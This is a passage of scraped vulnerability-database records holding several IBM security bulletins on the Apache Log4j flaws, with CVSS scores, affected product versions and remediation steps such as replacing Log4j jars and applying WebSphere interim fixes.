code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.\n\n \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customer with extension.\n\n## Remediation/Fixes\n\n**IMPORTANT**\n\nThe fix in this bulletin has been superseded by [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539408>). \n--- \n \n**IBM strongly recommends addressing the vulnerability now by upgrading. **\n\nDepending on your GKLM/SKLM version, see the relevant section:\n\n * For SKLM 3.0, 3.0.1 and SKLM 4.0\n * For GKLM 4.1\n * For GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1 and SKLM 4.0\n\nFor information about the vulnerability fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \$CVE-2021-44228\$\" ) \u200b\u200b\u200b.\u200b\u200b\n\nYou only need to apply the interim fix provided by the WAS team. Before you apply the interim fix, check the WAS minimum fix pack requirement and the supported WAS for your SKLM version (see [Support Matrix](<https://www.ibm.com/support/pages/node/296957>)). \n\nFor instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Note:** _Also applicable for SKLM 2.7_ (**only for customers with extension**).\n\n** Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.0\n\n 1. On Linux and AIX systems, log in as the database user. For example, sklmdb41.\n 2. Stop WebSphere Application Server.\n\n**On Linux or AIX:**\n \n WAS_HOME/bin/stopServer.sh\u00a0server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/stopServer.sh server1 -username wasadmin -password waspassword\n\n**On Windows:**\n \n WAS_HOME\\bin\\stopServer.bat server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\stopServer.bat server1 -username wasadmin -password waspassword\n\n 3. Apply the WebSphere Application Server interim fix provided by the WAS team. For instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>). \n\nFor information about the vulnerability and fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \$CVE-2021-44228\$\" ) . \n\n**Note**: You only need to apply the interim fix provided by the WAS team.\n\n 4. Update Log4j.\n\n 1. Download the latest log4j 2.15.0 files from the following link: \n\n<https://archive.apache.org/dist/logging/log4j/2.15.0/>\n\n 2. Depending on your platform, download the applicable file: \n * apache-log4j-2.15.0-bin.tar.gz\n * apache-log4j-2.15.0-bin.zip\n 3. Extract the downloaded files. Copy the following extracted JAR files to some other location (for example, desktop): \n * log4j-api-2.15.0.jar\n * log4j-core-2.15.0.jar\n 4. Rename the JAR files as follows: \n * log4j-api-2.15.0.jar to log4j-api-2.13.3.jar\n * log4j-core-2.15.0.jar to log4j-core-2.13.3.jar\n\n**Note:** This is a workaround. Because of this workaround, even after you apply the fix, the grep command shows log4j-api-2.13.3.jar version in the output. However, be assured that Log4j is upgraded to log4j-api-2.15.0.jar.\n\n 5. Copy the renamed Log4j JAR files to the following location: \n\n**On Linux or AIX:**\n \n WAS_HOME/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\n**On Windows:**\n \n WAS_HOME\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\n 5. Start WebSphere Application Server. \n\n**On Linux or AIX:**\n \n WAS_HOME/bin/startServer.sh server1\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/startServer.sh server1\n\n**On Windows:**\n \n WAS_HOME\\bin\\startServer.bat server1\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\startServer.bat server1\n\n** **\n\n** **\n\n** ****Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required.\n\n* * *\n\n## For GKLM 4.1.1\n\nThis issue is fixed in [GKLM 4.1.1 - Fix Pack 2](<https://www.ibm.com/support/pages/node/6525282> \"GKLM 4.1.1 - Fix Pack 2\" ). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n* * *\n\n** **\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWPVP\",\"label\":\"IBM Security Key Lifecycle Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.7**, 3.0, 3.0.1, 4.0, 4.1.0, 4.1.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T14:07:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j (CVE-2021-44228) vulnerability in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) and IBM Security Guardium Key Lifecycle Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T14:07:15", "id": "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "href": "https://www.ibm.com/support/pages/node/6527756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:37:20", "description": "## Summary\n\nThere are multiple Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45105) impacting IBM StoredIQ for Legal. Apache Log4j is included in WebSphere Application Server (WAS), which is distributed with IBM Stored IQ for Legal. These vulnerabilities are addressed by removing Apache Log4j from WAS.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nStoredIQ for Legal| 2.0.3 \n \n\n\n## Remediation/Fixes\n\nFor the affected version specified above, apply [PH42762](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/StoredIQ+for+Legal&release=2.0.3.14&platform=All&function=all> \"\" ) interim fix on top of WAS 8.5.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n08 Jun 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZL2P\",\"label\":\"StoredIQ for Legal\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"2.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T07:56:30", "type": "ibm", "title": "Security Bulletin: IBM StoredIQ for Legal is vulnerable to denial of service and remote code execution due to Apache log4j ( CVE-2021-44228, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-06-09T07:56:30", "id": "1827A1B8985F4A2B91EE262D4C17EF01B71CFEA86DB0A386BD1C1B098E2F4B69", "href": "https://www.ibm.com/support/pages/node/6593781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:48", "description": "## Summary\n\nCrypto Hardware Initialization and Maintenance (CHIM 3.0.0) as shipped with CCA 7.2.55 for MTM 4769 is affected by several vulnerabilities in Apache Log4j (CVE-2021-45105 and CVE-2021-45046). CHIM is using Apache Log4j for internal logging purposes of regular user activity. The fix includes Apache Log4j 2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nCrypto Hardware Initialization and Maintenance| CHIM 3.0.0 for CCA 7.2.55 for MTM 4769 (setup4769_7.2.55.bin) \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading:**\n\n**Product(s)**| **Fixed Version(s)** \n---|--- \nCrypto Hardware Initialization and Maintenance (CHIM)| CHIM 3.0.1 for CCA 7.2.55 for MTM 4769 (setup4769_chim_log4j_patch_7.2.55.bin) \n \nThe fixed version can be obtained from the [CCA Software Download Page](<https://www.ibm.com/security/cryptocards/pciecc4/software> \"CCA Software Download Page\" ).\n\n## Workarounds and Mitigations\n\nFor local administrative purposes the Crypto Node Management (CNM) tool can be used instead of Crypto Hardware Initialization and Maintenance (CHIM) for most administrative tasks.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[Security Bulletin: Vulnerability in Apache Log4J addressed in Crypto Hardware Initialization and Maintenance (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6538138> \"Security Bulletin: Vulnerability in Apache Log4J addressed in Crypto Hardware Initialization and Maintenance \$CVE-2021-44228\$\" ) \n[CCA Software Download Page](<https://www.ibm.com/security/cryptocards/pciecc4/software> \"CCA Software Download Page\" )\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW19X\",\"label\":\"Other xSeries\"},\"Component\":\"MTM 4769 - Crypto Hardware Installation and Maintenance Tool\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"MTM 4769 - CHIM 3.0.0.x\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T21:57:12", "type": "ibm", "title": "Security Bulletin: Crypto Hardware Initialization and Maintenance is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T21:57:12", "id": "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "href": "https://www.ibm.com/support/pages/node/6541056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:35:30", "description": "## Summary\n\nEnterprise Content Management System Monitor is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046). Apache Log4j is used by Enterprise Content Management System Monitor as part of its logging infrastructure.The fix includes Apache Log4j v2.17.1\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nEnterprise Content Management System Monitor| 5.5 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading. \n\nPlease use below url of Fix Central to download fix:\n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.5.0&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.5.0&platform=All&function=all>)\n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.5.1&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.5.1&platform=All&function=all>)\n\n[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.7.0&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/FileNet+System+Monitor&release=5.5.7.0&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSEM9N\",\"label\":\"Enterprise Content Management System Monitor\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"5.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T07:18:10", "type": "ibm", "title": "Security Bulletin: Enterprise Content Management System Monitor is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-07-12T07:18:10", "id": "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "href": "https://www.ibm.com/support/pages/node/6602951", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:06", "description": "## Summary\n\nThere are vulnerabilities in the version of Apache Log4j that is used by IBM Data Virtualization on Cloud Pak for Data (CVE-2021-45046 and CVE-2021-45105) which is used for logging. The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **DV Version(s) \n**| \n\n**CPD ****Version(s) ** \n \n---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9 \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 